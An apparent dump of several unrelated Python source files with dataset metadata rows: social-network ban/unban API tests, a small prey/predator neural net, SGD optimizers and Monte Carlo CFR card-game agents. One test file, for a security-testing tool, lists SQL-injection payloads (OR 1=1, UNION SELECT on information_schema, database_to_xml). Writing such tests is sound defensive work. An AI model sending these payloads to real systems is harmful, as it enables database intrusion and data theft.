self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user_to_ban.is_banned_from_community_with_name(community.name))
def test_ban_user_makes_it_no_longer_a_member_of_community(self):
"""
should remove membership of a user when banned from a community
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user)
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_ban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_ban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(user_to_ban.is_member_of_community_with_name(community_name))
def _get_url(self, community_name):
return reverse('community-ban-user', kwargs={
'community_name': community_name
})
class UnbanCommunityUserAPITest(OpenbookAPITestCase):
def test_can_unban_user_from_community_if_mod(self):
"""
should be able to unban user from a community if is moderator and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_unban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_unban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(user_to_unban.is_banned_from_community_with_name(community.name))
def test_logs_user_unbanned(self):
"""
should create a log when a community user is unbanned
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_unban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_unban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertTrue(community.logs.filter(action_type='U',
source_user=user,
target_user=user_to_unban).exists())
def test_cant_unban_user_from_community_if_already_banned(self):
"""
should not be able to unban user from a community if is not banned and return 400
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_moderator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_unban = make_user()
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(user_to_unban.is_banned_from_community_with_name(community.name))
def test_can_unban_user_from_community_if_admin(self):
"""
should be able to unban user from a community if is admin and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
other_user.add_administrator_with_username_to_community_with_name(username=user.username,
community_name=community.name)
user_to_unban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_unban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(user_to_unban.is_banned_from_community_with_name(community.name))
def test_cant_unban_user_from_community_if_member(self):
"""
should not be able to unban user from a community if is member and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user.join_community_with_name(community_name)
user_to_unban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_unban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(user_to_unban.is_banned_from_community_with_name(community.name))
def test_cant_ban_user_from_community(self):
"""
should not be able to ban user from a community and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
other_user = make_user()
community = make_community(creator=other_user, type='P')
community_name = community.name
user_to_unban = make_user()
other_user.ban_user_with_username_from_community_with_name(username=user_to_unban.username,
community_name=community_name)
url = self._get_url(community_name=community.name)
response = self.client.post(url, {
'username': user_to_unban.username
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(user_to_unban.is_banned_from_community_with_name(community.name))
def _get_url(self, community_name):
return reverse('community-unban-user', kwargs={
'community_name': community_name
})
class SearchCommunityBannedUsersAPITests(OpenbookAPITestCase):
"""
SearchCommunityBannedUsersAPITests
"""
def test_can_search_community_banned_users_by_name(self):
"""
should be able to search for community banned users by their name and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
amount_of_community_banned_users_to_search_for = 5
for i in range(0, amount_of_community_banned_users_to_search_for):
banned_user = make_user()
banned_user.join_community_with_name(community_name=community.name)
user.ban_user_with_username_from_community_with_name(username=banned_user.username,
community_name=community.name)
banned_user_username = banned_user.profile.name
amount_of_characters_to_query = random.randint(1, len(banned_user_username))
query = banned_user_username[0:amount_of_characters_to_query]
final_query = ''
for character in query:
final_query = final_query + (character.upper() if fake.boolean() else character.lower())
url = self._get_url(community_name=community.name)
response = self.client.get(url, {
'query': final_query
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_banned_users = json.loads(response.content)
response_banned_users_count = len(response_banned_users)
if response_banned_users_count == 1:
# Our community creator was not retrieved
self.assertEqual(response_banned_users_count, 1)
retrieved_banned_user = response_banned_users[0]
self.assertEqual(retrieved_banned_user['id'], banned_user.id)
else:
# Our community creator was retrieved too
for response_banned_user in response_banned_users:
response_banned_user_id = response_banned_user['id']
self.assertTrue(
response_banned_user_id == banned_user.id or response_banned_user_id == user.id)
user.unban_user_with_username_from_community_with_name(username=banned_user.username,
community_name=community.name)
def test_can_search_community_banned_users_by_username(self):
"""
should be able to search for community banned_users by their username and return 200
"""
user = make_user()
headers = make_authentication_headers_for_user(user)
community = make_community(creator=user)
amount_of_community_banned_users_to_search_for = 5
for i in range(0, amount_of_community_banned_users_to_search_for):
banned_user = make_user()
banned_user.join_community_with_name(community_name=community.name)
user.ban_user_with_username_from_community_with_name(username=banned_user.username,
community_name=community.name)
banned_user_username = banned_user.username
amount_of_characters_to_query = random.randint(1, len(banned_user_username))
query = banned_user_username[0:amount_of_characters_to_query]
final_query = ''
for character in query:
final_query = final_query + (character.upper() if fake.boolean() else character.lower())
url = self._get_url(community_name=community.name)
response = self.client.get(url, {
'query': final_query
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_banned_users = json.loads(response.content)
response_banned_users_count = len(response_banned_users)
if response_banned_users_count == 1:
# Our community creator was not retrieved
self.assertEqual(response_banned_users_count, 1)
retrieved_banned_user = response_banned_users[0]
self.assertEqual(retrieved_banned_user['id'], banned_user.id)
else:
# Our community creator was retrieved too
for response_banned_user in response_banned_users:
response_banned_user_id = response_banned_user['id']
self.assertTrue(
response_banned_user_id == banned_user.id or response_banned_user_id == user.id)
user.unban_user_with_username_from_community_with_name(username=banned_user.username,
community_name=community.name)
def _get_url(self, community_name):
return reverse('search-community-banned-users', kwargs={
'community_name': community_name,
})
| 40.967159 | 106 | 0.646399 | 2,896 | 24,949 | 5.167127 | 0.049378 | 0.142475 | 0.10679 | 0.11815 | 0.947808 | 0.945068 | 0.9444 | 0.932638 | 0.916132 | 0.902967 | 0 | 0.006877 | 0.283098 | 24,949 | 608 | 107 | 41.034539 | 0.829755 | 0.070103 | 0 | 0.874036 | 0 | 0 | 0.012341 | 0.002248 | 0 | 0 | 0 | 0 | 0.105398 | 1 | 0.061697 | false | 0 | 0.020566 | 0.010283 | 0.102828 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0e1a552d2ba264e6ea9d51cece9766c7dbe86c25 | 1,694 | py | Python | Zoo/neural_network_sense/nn_model.py | Tanmay-Kumar-Sinha/Evolution-Simulation | 1740c32320de7f8eab2780075f1161781eb520d1 | [
"MIT"
] | 7 | 2019-10-21T13:40:28.000Z | 2021-04-07T01:36:15.000Z | Zoo/neural_network_sense/nn_model.py | Tanmay-Kumar-Sinha/Evolution-Simulation | 1740c32320de7f8eab2780075f1161781eb520d1 | [
"MIT"
] | 13 | 2020-03-22T15:36:36.000Z | 2020-06-03T19:41:18.000Z | Zoo/neural_network_sense/nn_model.py | Tanmay-Kumar-Sinha/Evolution-Simulation | 1740c32320de7f8eab2780075f1161781eb520d1 | [
"MIT"
] | 4 | 2019-10-25T12:14:06.000Z | 2020-05-30T15:32:53.000Z | import numpy as np
"""
Simple model class for prey:
4 input neurons:
2 corresponding to the vector away from the closest predator
2 corresponding to the vector towards the closest food
4x2 hidden layers
2 output neurons corresponding to the direction of sense velocity prey should take
Takes input as the weights for neural-net
"""
class model_simple_prey():
def __init__(self, weights = np.random.uniform(-1,1,(4,10))):
self.weights = weights
def forward(self,x):
'''
x is a 4x1 vector
'''
x = np.tanh(self.weights[:,:4].T.dot(x))
x = np.tanh(self.weights[:,4:8].T.dot(x))
x = np.tanh(self.weights[:,8:].T.dot(x))
return x
def get_weights(self):
return self.weights
# def mutate(self):
# return self.weights + np.random.normal(0,1,self.weights.shape)
"""
Simple model class for predator:
2 input neurons corresponding to the vector towards the closest prey
2x2 hidden layers
2 output neurons corresponding to the direction of sense velocity predator should take
Takes input as the weights for neural-net
"""
class model_simple_predator():
def __init__(self, weights = np.random.uniform(-1,1,(2,6))):
self.weights = weights
def forward(self,x):
'''
x is a 4x1 vector
'''
x = np.tanh(self.weights[:,:2].T.dot(x))
x = np.tanh(self.weights[:,2:4].T.dot(x))
x = np.tanh(self.weights[:,4:].T.dot(x))
return x
def get_weights(self):
return self.weights
def mutate(self):
return self.weights + np.random.normal(0,1,self.weights.shape) | 27.322581 | 90 | 0.621015 | 251 | 1,694 | 4.135458 | 0.243028 | 0.169557 | 0.040462 | 0.063584 | 0.843931 | 0.818882 | 0.816956 | 0.737958 | 0.693642 | 0.626204 | 0 | 0.028022 | 0.262692 | 1,694 | 62 | 91 | 27.322581 | 0.803042 | 0.071429 | 0 | 0.434783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.304348 | false | 0 | 0.043478 | 0.130435 | 0.652174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
0e259cdf584fab606e9f01d67b5b2454012c6a74 | 4,748 | py | Python | tests/batch_generation/test_generate_unsafe_bodies.py | ashton-szabo/api-automation-tools | 279e258623cfe919a4385e63f3badaed66a61561 | [
"MIT"
] | null | null | null | tests/batch_generation/test_generate_unsafe_bodies.py | ashton-szabo/api-automation-tools | 279e258623cfe919a4385e63f3badaed66a61561 | [
"MIT"
] | null | null | null | tests/batch_generation/test_generate_unsafe_bodies.py | ashton-szabo/api-automation-tools | 279e258623cfe919a4385e63f3badaed66a61561 | [
"MIT"
] | 4 | 2022-03-09T06:11:59.000Z | 2022-03-10T02:09:34.000Z | import pytest
import apiautomationtools.batch_generation.batch_generation as bg
pytestmark = pytest.mark.batch_generation
def test_generate_unsafe_bodies_sub_value():
body = {"field1": "value1", "field2": "2", "file": "file", "file2": "file2"}
unsafe_bodies = bg.generate_unsafe_bodies(body)
expected_bodies = [
{"field1": "value1 '--", "field2": "2 '--"},
{"field1": "value1 '+OR+1=1--", "field2": "2 '+OR+1=1--"},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{"field1": "value1 '--", "field2": "2 '--"},
{"field1": "value1 '+OR+1=1--", "field2": "2 '+OR+1=1--"},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{"field1": "value1 '--", "field2": "2 '--"},
{"field1": "value1 '+OR+1=1--", "field2": "2 '+OR+1=1--"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{"field1": "value1 '--", "field2": "2 '--"},
{
"field1": "value1 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
"field2": "2 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{"field1": "value1 '--", "field2": "2 '--"},
{
"field1": "value1 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
"field2": "2 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{"field1": "value1 '--", "field2": "2 '--"},
{
"field1": "value1 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
"field2": "2 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{"field1": "value1 '--", "field2": "2 '--"},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{"field1": "value1 '+OR+1=1--", "field2": "2 '+OR+1=1--"},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{
"field1": "value1 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
"field2": "2 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
]
assert unsafe_bodies == expected_bodies
| 45.653846 | 89 | 0.507372 | 481 | 4,748 | 4.891892 | 0.089397 | 0.188695 | 0.107097 | 0.113047 | 0.887378 | 0.887378 | 0.887378 | 0.887378 | 0.887378 | 0.887378 | 0 | 0.058615 | 0.288543 | 4,748 | 103 | 90 | 46.097087 | 0.637951 | 0 | 0 | 0.545455 | 1 | 0 | 0.598357 | 0.199242 | 0 | 0 | 0 | 0 | 0.010101 | 1 | 0.010101 | false | 0 | 0.020202 | 0 | 0.030303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0e88b430b24e7146cd760beda3d6cd92f875ac91 | 2,710 | py | Python | optimizers/sgd_optimizer.py | AIDRI/optimizer-using-numpy | 24bd6d746e3e7f21536ca7d88d4ff96912d6fb21 | [
"MIT"
] | 1 | 2021-02-09T19:47:40.000Z | 2021-02-09T19:47:40.000Z | optimizers/sgd_optimizer.py | AIDRI/optimizer-using-numpy | 24bd6d746e3e7f21536ca7d88d4ff96912d6fb21 | [
"MIT"
] | null | null | null | optimizers/sgd_optimizer.py | AIDRI/optimizer-using-numpy | 24bd6d746e3e7f21536ca7d88d4ff96912d6fb21 | [
"MIT"
] | null | null | null | class SGD_no_momentum():
def __init__(self, func, partial_derivative):
self.w = [-10, -1] #random value
self.e = 0.0005
self.func = func
self.partial_derivative = partial_derivative
def theta_update(self, w):
self.w[0] -= self.e * self.grad[0]
self.w[1] -= self.e * self.grad[1]
def train(self):
J_min = 0
J = self.func(self.w)
epochs = 0
print(J_min, J)
while abs(J_min - J) > 1e-8:
if epochs != 0:
J_min = J
J = self.func(self.w)
self.grad = self.partial_derivative(self.w)
self.theta_update(self.grad)
epochs += 1
if epochs%10==0:
print('Epochs : {} ; Cost : {}'.format(epochs, J))
print('Epochs : {} ; Cost : {}'.format(epochs, J))
print('Global Minima : {} ; {}'.format(self.w[0], self.w[1]))
class SGD_momentum():
def __init__(self, func, partial_derivative):
self.w = [2.5, 1.2] #random value
self.v = [0, 0]
self.e = 0.0001
self.func = func
self.partial_derivative = partial_derivative
def theta_update(self, grads):
self.v[0] = 0.9 * self.v[0] - self.e * grads[0]
self.w[0] += self.v[0]
self.v[1] = 0.9 * self.v[1] - self.e * grads[1]
self.w[1] += self.v[1]
def train(self):
J_min = 0
J = self.func(self.w)
epochs = 0
print(J_min, J)
while abs(J_min - J) > 1e-8:
if epochs != 0:
J_min = J
J = self.func(self.w)
self.grad = self.partial_derivative(self.w)
self.theta_update(self.grad)
epochs += 1
if epochs%500==0:
print('Epochs : {} ; Cost : {} ; X : {} ; Y : {}'.format(epochs, J, self.w[0], self.w[1]))
print('Epochs : {} ; Cost : {} ; X : {} ; Y : {}'.format(epochs, J, self.w[0], self.w[1]))
print('Global Minima : {} ; {}'.format(self.w[0], self.w[1]))
class SGD_nesterov():
def __init__(self, func, partial_derivative):
self.w = [2.5, 1.2] #random value
self.v = [0, 0]
self.e = 0.0001
self.func = func
self.partial_derivative = partial_derivative
def theta_update(self, grads):
self.v[0] = 0.9 * self.v[0] - self.e * grads[0]
self.w[0] += self.v[0]
self.v[1] = 0.9 * self.v[1] - self.e * grads[1]
self.w[1] += self.v[1]
def train(self):
J_min = 0
J = self.func(self.w)
epochs = 0
print(J_min, J)
while abs(J_min - J) > 1e-8:
if epochs != 0:
J_min = J
J = self.func(self.w)
X_ = self.w[0] + 0.9 * self.v[0]
Y_ = self.w[1] + 0.9 * self.v[1]
W_ = [X_, Y_]
self.grad = self.partial_derivative(W_)
self.theta_update(self.grad)
epochs += 1
if epochs%500==0:
print('Epochs : {} ; Cost : {} ; X : {} ; Y : {}'.format(epochs, J, self.w[0], self.w[1]))
print('Epochs : {} ; Cost : {} ; X : {} ; Y : {}'.format(epochs, J, self.w[0], self.w[1]))
print('Global Minima : {} ; {}'.format(self.w[0], self.w[1])) | 27.938144 | 94 | 0.577491 | 474 | 2,710 | 3.191983 | 0.094937 | 0.11236 | 0.043622 | 0.066094 | 0.933906 | 0.914739 | 0.902842 | 0.865829 | 0.865829 | 0.8308 | 0 | 0.052977 | 0.212915 | 2,710 | 97 | 95 | 27.938144 | 0.656353 | 0.013284 | 0 | 0.845238 | 0 | 0 | 0.104416 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0 | 0 | 0 | 0.142857 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7ef96eb3836e3e160d7c21cf050c4812ba632359 | 341 | py | Python | ngocbienml/metrics/__init__.py | ngocbien/ngocbienml | dcaa4707f5b513153e7be20538923e741894b2a2 | [
"MIT"
] | 1 | 2021-06-04T06:50:38.000Z | 2021-06-04T06:50:38.000Z | ngocbienml/metrics/__init__.py | ngocbien/ngocbienml | dcaa4707f5b513153e7be20538923e741894b2a2 | [
"MIT"
] | null | null | null | ngocbienml/metrics/__init__.py | ngocbien/ngocbienml | dcaa4707f5b513153e7be20538923e741894b2a2 | [
"MIT"
] | null | null | null | from .metrics_ import multiclass_score, binary_score, gini, confusion_matrix, binary_score_, binary_scoreKfold, find_best_threshold
__all__ = ["multiclass_score",
"binary_score",
"gini",
"confusion_matrix",
"binary_score_",
"binary_scoreKfold",
"find_best_threshold"] | 42.625 | 133 | 0.642229 | 32 | 341 | 6.1875 | 0.4375 | 0.222222 | 0.212121 | 0.262626 | 0.89899 | 0.89899 | 0.89899 | 0.89899 | 0.89899 | 0.89899 | 0 | 0 | 0.269795 | 341 | 8 | 134 | 42.625 | 0.795181 | 0 | 0 | 0 | 0 | 0 | 0.289552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
7d002e3cfd2a3bd1815aa90bf4d5d2881783b5ae | 28,436 | py | Python | rlcard/agents/MCCFR_agents.py | aditya140/rlcard | de203b9b74a653019452aeb0622345f33dd42eda | [
"MIT"
] | null | null | null | rlcard/agents/MCCFR_agents.py | aditya140/rlcard | de203b9b74a653019452aeb0622345f33dd42eda | [
"MIT"
] | null | null | null | rlcard/agents/MCCFR_agents.py | aditya140/rlcard | de203b9b74a653019452aeb0622345f33dd42eda | [
"MIT"
] | null | null | null | import numpy as np
import collections
import os
import pickle
from rlcard.utils.utils import *
class ChanceSampling_CFR:
"""Implementation of CFR algorithm"""
def __init__(self, env, model_path="./ChanceSampling_cfr_model"):
"""Initialize Model
Args:
env : Env Clas
model_path (str, optional): [description]. Defaults to './vanila_cfr_model'.
"""
self.use_raw = False
self.env = env
self.model_path = model_path
# Policy = σ
# A policy is a dict state_str -> action probability
self.policy = collections.defaultdict(list)
# average_policy = s
self.average_policy = collections.defaultdict(np.array)
# Regret is a dict state_str -> action regrets
self.regrets = collections.defaultdict(np.array)
self.iteration = 0
def train(self):
""" One iteration of CRF"""
self.iteration += 1
# Firstly, traverse tree to compute counterfactual regret for each player
# The regrets are recorded in traversal
for player_id in range(self.env.player_num):
self.env.reset()
# probs = π
probs = np.ones(self.env.player_num)
self.traverse_tree(probs, player_id)
# Update policy
self.update_policy()
def traverse_tree(self, probs, player_id):
"""
if terminal node return utility = payoff
"""
if self.env.is_over():
return self.env.get_payoffs()
current_player = self.env.get_player_id()
# action_utilities = v_σ(I->a)
action_utilities = {}
# state_utility = v_σ
state_utility = np.zeros(self.env.player_num)
# obs = h, legal_actions = A(I)
obs, legal_actions = self.get_state(current_player)
# action probs = σ(I,.)
action_probs = self.action_probs(obs, legal_actions, self.policy)
"""
σ^t(I) <- RegretMatching(r_I)
v_σ <- 0
v_σ_(I->a)[a] <- 0 for all a ∈ A(I)
"""
for action in legal_actions:
# action prob = σ(I,a)
action_prob = action_probs[action]
new_probs = probs.copy()
# σ(I,a) * π
new_probs[current_player] *= action_prob
# Keep traversing the child state
# Each chance node is sampled internally by the environment
self.env.step(action)
# Utility = v_σ(I->a)[a]
utility = self.traverse_tree(new_probs, player_id)
self.env.step_back()
# State utility = v_σ
# v_σ = v_σ + σ(I,a)*v_σ(I->a)[a]
state_utility += action_prob * utility
action_utilities[action] = utility
"""
if P(h) != i:
return v_σ
"""
if not current_player == player_id:
return state_utility
"""
if P(h) == i:
for a ∈ A(I):
r_I[a] <- r_I[a] + π_(-i) (v_σ(I->a)[a] - v_σ)
s[I,a] <- s[I,a] + iter * π_(i) * σ(I,a)
"""
# If it is current player, we record the policy and compute regret
# player_prob = π_(i)
player_prob = probs[current_player]
# counterfactual_prob = π_(-i)
counterfactual_prob = np.prod(probs[:current_player]) * np.prod(
probs[current_player + 1 :]
)
# player_state_utility = v_σ
player_state_utility = state_utility[current_player]
if obs not in self.regrets:
# regret to be initialized as 0 for each action
self.regrets[obs] = np.zeros(self.env.action_num)
if obs not in self.average_policy:
# Average policy initialized as 0 for each legal state and action pair
self.average_policy[obs] = np.zeros(self.env.action_num)
for action in legal_actions:
# action prob = σ(I,a)
action_prob = action_probs[action]
# regret = π_(-i) * (v_σ(I->a)[a] - v_σ)
regret = counterfactual_prob * (
action_utilities[action][current_player] - player_state_utility
)
# r[I,a] = r[I,a] + π_(-i) * (v_σ(I->a)[a] - v_σ)
self.regrets[obs][action] += regret
# s[I,a] = s[I,a] + iter * π_(i) * σ(I,a)
self.average_policy[obs][action] += player_prob * action_prob
# return v_σ
return state_utility
def regret_matching(self, obs):
"""Regret Matching using
{ R^T,+(I,a) / Σ_a (R)^T,+(I,a) if Σ_a (R)^T,+(I,a)>0
σ^(T+1) (I,a) = {
{ 1/|A(I)| else
Args:
obs (string):
Returns:
action_probability
"""
regret = self.regrets[obs]
# positive_regret_sum = Σ_a (R)^T,+(I,a)
positive_regret_sum = sum([r for r in regret if r > 0])
# action probs = σ^T+1 (I,.)
action_probs = np.zeros(self.env.action_num)
if positive_regret_sum > 0:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = R^T,+(I,a) / Σ_a (R)^T,+(I,a)
action_probs[action] = max(0.0, regret[action] / positive_regret_sum)
else:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = 1/|A(I)|
action_probs[action] = 1.0 / self.env.action_num
return action_probs
def update_policy(self):
"""Update policy based on the current regrets"""
for obs in self.regrets:
self.policy[obs] = self.regret_matching(obs)
def action_probs(self, obs, legal_actions, policy):
"""Obtain the action probabilities of the current state
Args:
obs (str): state_str
legal_actions (list): List of leagel actions
player_id (int): The current player
policy (dict): The used policy
Returns:
(tuple) that contains:
action_probs(numpy.array): The action probabilities
legal_actions (list): Indices of legal actions
"""
if obs not in policy.keys():
action_probs = np.array(
[1.0 / self.env.action_num for _ in range(self.env.action_num)]
)
self.policy[obs] = action_probs
else:
action_probs = policy[obs]
action_probs = remove_illegal(action_probs, legal_actions)
return action_probs
def eval_step(self, state):
"""Given a state, predict action based on average policy
Args:
state (numpy.array): State representation
Returns:
action (int): Predicted action
"""
probs = self.action_probs(
state["obs"].tostring(), state["legal_actions"], self.average_policy
)
action = np.random.choice(len(probs), p=probs)
return action, probs
def get_state(self, player_id):
"""Get state_str of the player
Args:
player_id (int): The player id
Returns:
(tuple) that contains:
state (str): The state str
legal_actions (list): Indices of legal actions
"""
state = self.env.get_state(player_id)
return state["obs"].tostring(), state["legal_actions"]
def save(self):
"""Save model"""
if not os.path.exists(self.model_path):
os.makedirs(self.model_path)
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "wb")
pickle.dump(self.policy, policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "wb"
)
pickle.dump(self.average_policy, average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "wb")
pickle.dump(self.regrets, regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "wb")
pickle.dump(self.iteration, iteration_file)
iteration_file.close()
def load(self):
"""Load model"""
if not os.path.exists(self.model_path):
return
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "rb")
self.policy = pickle.load(policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "rb"
)
self.average_policy = pickle.load(average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "rb")
self.regrets = pickle.load(regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "rb")
self.iteration = pickle.load(iteration_file)
iteration_file.close()
class ExternalSampling_CFR:
"""Implementation of External Sampling CFR algorithm
External Sampling with Stochastically-Weighted Averaging
Initialize: ∀I ∈ I,∀a ∈ A(I) : rI[a] ← sI[a] ← 0
ExternalSampling(h,i):
if h ∈ Z then return ui(h)
if P (h) = c then sample a′ and return ExternalSampling(ha′ , i)
Let I be the information set containing h
σ(I) ← RegretMatching(rI )
if P(I)=i then
Let u be an array indexed by actions and uσ ← 0
for a ∈ A(I) do
u[a] ← ExternalSampling(ha, i)
uσ ←uσ +σ(I,a)·u[a]
for a ∈ A(I) do
By Equation 4.20, compute r ̃(I, a) ← u[a] − uσ
r I [ a ] ← r I [ a ] + r ̃ ( I , a )
return uσ
else
Sample action a′ from σ(I)
u ← ExternalSampling(ha′, i)
for a ∈ A(I) do
sI [a] ← sI [a] + σ(I, a)
return u
"""
def __init__(self, env, model_path="./external_sampling_cfr_model"):
"""Initialize Model
Args:
env : Env Clas
model_path (str, optional): [description]. Defaults to './vanila_cfr_model'.
"""
self.use_raw = False
self.env = env
self.model_path = model_path
# Policy = σ
# A policy is a dict state_str -> action probability
self.policy = collections.defaultdict(list)
# average_policy = s
self.average_policy = collections.defaultdict(np.array)
# Regret is a dict state_str -> action regrets
self.regrets = collections.defaultdict(np.array)
self.iteration = 0
def train(self):
""" One iteration of CRF"""
self.iteration += 1
